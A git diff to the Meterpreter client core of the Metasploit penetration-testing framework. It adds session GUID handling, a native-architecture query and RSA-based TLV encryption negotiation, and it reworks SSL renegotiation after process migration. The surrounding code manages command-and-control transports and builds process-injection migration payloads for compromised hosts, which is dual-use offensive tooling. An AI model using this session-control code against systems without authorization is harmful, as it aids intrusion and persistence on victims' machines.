@@ -17,6 +17,8 @@ require 'rex/payloads/meterpreter/uri_checksum'
 # certificate hash checking
 require 'rex/socket/x509_certificate'
 
+require 'openssl'
+
 module Rex
 module Post
 module Meterpreter
@@ -125,6 +127,9 @@ class ClientCore < Extension
     result
   end
 
+  #
+  # Set associated transport timeouts for the currently active transport.
+  #
   def set_transport_timeouts(opts={})
     request = Packet.create_request('core_transport_set_timeouts')
 
@@ -207,7 +212,7 @@ class ClientCore < Extension
         image = f.read
       }
 
-      if !image.nil?
+      if image
         request.add_tlv(TLV_TYPE_DATA, image, false, client.capabilities[:zlib])
       else
         raise RuntimeError, "Failed to serialize library #{library_path}.", caller
@@ -298,6 +303,9 @@ class ClientCore < Extension
     return true
   end
 
+  #
+  # Set the UUID on the target session.
+  #
   def set_uuid(uuid)
     request = Packet.create_request('core_set_uuid')
     request.add_tlv(TLV_TYPE_UUID, uuid.to_raw)
@@ -307,10 +315,42 @@ class ClientCore < Extension
     true
   end
 
+  #
+  # Set the session GUID on the target session.
+  #
+  def set_session_guid(guid)
+    request = Packet.create_request('core_set_session_guid')
+    request.add_tlv(TLV_TYPE_SESSION_GUID, [guid.gsub(/-/, '')].pack('H*'))
+
+    client.send_request(request)
+
+    true
+  end
+
+  #
+  # Get the session GUID from the target session.
+  #
+  def get_session_guid(timeout=nil)
+    request = Packet.create_request('core_get_session_guid')
+
+    args = [request]
+    args << timeout if timeout
+
+    response = client.send_request(*args)
+
+    bytes = response.get_tlv_value(TLV_TYPE_SESSION_GUID)
+
+    parts = bytes.unpack('H*')[0]
+    [parts[0, 8], parts[8, 4], parts[12, 4], parts[16, 4], parts[20, 12]].join('-')
+  end
+
+  #
+  # Get the machine ID from the target session.
+  #
   def machine_id(timeout=nil)
     request = Packet.create_request('core_machine_id')
 
-    args = [ request ]
+    args = [request]
     args << timeout if timeout
 
     response = client.send_request(*args)
@@ -325,6 +365,24 @@ class ClientCore < Extension
     Rex::Text.md5(mid.to_s.downcase.strip)
   end
 
+  #
+  # Get the current native arch from the target session.
+  #
+  def native_arch(timeout=nil)
+    # Not all meterpreter implementations support this
+    request = Packet.create_request('core_native_arch')
+
+    args = [ request ]
+    args << timeout if timeout
+
+    response = client.send_request(*args)
+
+    response.get_tlv_value(TLV_TYPE_STRING)
+  end
+
+  #
+  # Remove a transport from the session based on the provided options.
+  #
   def transport_remove(opts={})
     request = transport_prepare_request('core_transport_remove', opts)
 
@@ -335,6 +393,9 @@ class ClientCore < Extension
     return true
   end
 
+  #
+  # Add a transport to the session based on the provided options.
+  #
   def transport_add(opts={})
     request = transport_prepare_request('core_transport_add', opts)
 
@@ -345,6 +406,9 @@ class ClientCore < Extension
     return true
   end
 
+  #
+  # Change the currently active transport on the session.
+  #
   def transport_change(opts={})
     request = transport_prepare_request('core_transport_change', opts)
 
@@ -355,6 +419,9 @@ class ClientCore < Extension
     return true
   end
 
+  #
+  # Sleep the current session for the given number of seconds.
+  #
   def transport_sleep(seconds)
     return false if seconds == 0
 
@@ -367,12 +434,18 @@ class ClientCore < Extension
     return true
   end
 
+  #
+  # Change the active transport to the next one in the transport list.
+  #
   def transport_next
     request = Packet.create_request('core_transport_next')
     client.send_request(request)
     return true
   end
 
+  #
+  # Change the active transport to the previous one in the transport list.
+  #
   def transport_prev
     request = Packet.create_request('core_transport_prev')
     client.send_request(request)
@@ -530,7 +603,12 @@ class ClientCore < Extension
     # Send the migration request. Timeout can be specified by the caller, or set to a min
     # of 60 seconds.
     timeout = [(opts[:timeout] || 0), 60].max
-    client.send_request(request, timeout)
+    response = client.send_request(request, timeout)
+
+    # Post-migration the session doesn't have encryption any more.
+    # Set the TLV key to nil to make sure that the old key isn't used
+    # at all.
+    client.tlv_enc_key = nil
 
     if client.passive_service
       # Sleep for 5 seconds to allow the full handoff, this prevents
@@ -546,28 +624,34 @@ class ClientCore < Extension
         # Now communicating with the new process
         ###
 
-        # If renegotiation takes longer than a minute, it's a pretty
-        # good bet that migration failed and the remote side is hung.
-        # Since we have the comm_mutex here, we *must* release it to
-        # keep from hanging the packet dispatcher thread, which results
-        # in blocking the entire process.
-        begin
-          Timeout.timeout(timeout) do
-            # Renegotiate SSL over this socket
-            client.swap_sock_ssl_to_plain()
-            client.swap_sock_plain_to_ssl()
+        # only renegotiate SSL if the session had support for it in the
+        # first place!
+        if client.supports_ssl?
+          # If renegotiation takes longer than a minute, it's a pretty
+          # good bet that migration failed and the remote side is hung.
+          # Since we have the comm_mutex here, we *must* release it to
+          # keep from hanging the packet dispatcher thread, which results
+          # in blocking the entire process.
+          begin
+            Timeout.timeout(timeout) do
+              # Renegotiate SSL over this socket
+              client.swap_sock_ssl_to_plain()
+              client.swap_sock_plain_to_ssl()
+            end
+          rescue TimeoutError
+            client.alive = false
+            return false
           end
-        rescue TimeoutError
-          client.alive = false
-          return false
         end
 
         # Restart the socket monitor
         client.monitor_socket
-
       end
     end
 
+    # Renegotiate TLV encryption on the migrated session
+    client.tlv_enc_key = negotiate_tlv_encryption
+
     # Load all the extensions that were loaded in the previous instance (using the correct platform/binary_suffix)
     client.ext.aliases.keys.each { |e|
       client.core.use(e)
@@ -609,12 +693,51 @@ class ClientCore < Extension
     end
   end
 
+  #
+  # Negotiates the use of encryption at the TLV level
+  #
+  def negotiate_tlv_encryption
+    sym_key = nil
+    rsa_key = OpenSSL::PKey::RSA.new(2048)
+    rsa_pub_key = rsa_key.public_key
+
+    request  = Packet.create_request('core_negotiate_tlv_encryption')
+    request.add_tlv(TLV_TYPE_RSA_PUB_KEY, rsa_pub_key.to_pem)
+
+    begin
+      response = client.send_request(request)
+      key_enc = response.get_tlv_value(TLV_TYPE_ENC_SYM_KEY)
+      key_type = response.get_tlv_value(TLV_TYPE_SYM_KEY_TYPE)
+
+      if key_enc
+        sym_key = rsa_key.private_decrypt(key_enc, OpenSSL::PKey::RSA::PKCS1_PADDING)
+      else
+        sym_key = response.get_tlv_value(TLV_TYPE_SYM_KEY)
+      end
+    rescue OpenSSL::PKey::RSAError, Rex::Post::Meterpreter::RequestError
+      # 1) OpenSSL error may be due to padding issues (or something else)
+      # 2) Request error probably means the request isn't supported, so fallback to plain
+    end
+
+    {
+      key:  sym_key,
+      type: key_type
+    }
+  end
+
 private
 
+  #
+  # Get a reference to the currently active transport.
+  #
   def get_current_transport
     transport_list[:transports][0]
   end
 
+  #
+  # Generate a migrate stub that is specific to the current transport type and the
+  # target process.
+  #
   def generate_migrate_stub(target_process)
     stub = nil
 
@@ -651,6 +774,10 @@ private
     stub
   end
 
+  #
+  # Helper function to prepare a transport request that will be sent to the
+  # attached session.
+  #
   def transport_prepare_request(method, opts={})
     unless valid_transport?(opts[:transport]) && opts[:lport]
       return nil
@@ -718,7 +845,7 @@ private
 
       if opts[:proxy_host] && opts[:proxy_port]
         prefix = 'http://'
-        prefix = 'socks=' if opts[:proxy_type] == 'socks'
+        prefix = 'socks=' if opts[:proxy_type].to_s.downcase == 'socks'
         proxy = "#{prefix}#{opts[:proxy_host]}:#{opts[:proxy_port]}"
         request.add_tlv(TLV_TYPE_TRANS_PROXY_HOST, proxy)
 
@@ -739,6 +866,9 @@ private
   end
 
 
+  #
+  # Create a full migration payload specific to the target process.
+  #
   def generate_migrate_payload(target_process)
     case client.platform
     when 'windows'
@@ -752,6 +882,9 @@ private
     blob
   end
 
+  #
+  # Create a full Windows-specific migration payload specific to the target process.
+  #
   def generate_migrate_windows_payload(target_process)
     c = Class.new( ::Msf::Payload )
     c.include( ::Msf::Payload::Stager )
@@ -771,16 +904,25 @@ private
     migrate_stager.stage_meterpreter
   end
 
+  #
+  # Create a full Linux-specific migration payload specific to the target process.
+  #
   def generate_migrate_linux_payload
     MetasploitPayloads.read('meterpreter', 'msflinker_linux_x86.bin')
   end
 
+  #
+  # Determine the elf entry poitn for the given payload.
+  #
   def elf_ep(payload)
     elf = Rex::ElfParsey::Elf.new( Rex::ImageSource::Memory.new( payload ) )
     ep = elf.elf_header.e_entry
     return ep
   end
 
+  #
+  # Get the tmp folder for the session.
+  #
   def tmp_folder
     tmp = client.sys.config.getenv('TMPDIR')
 
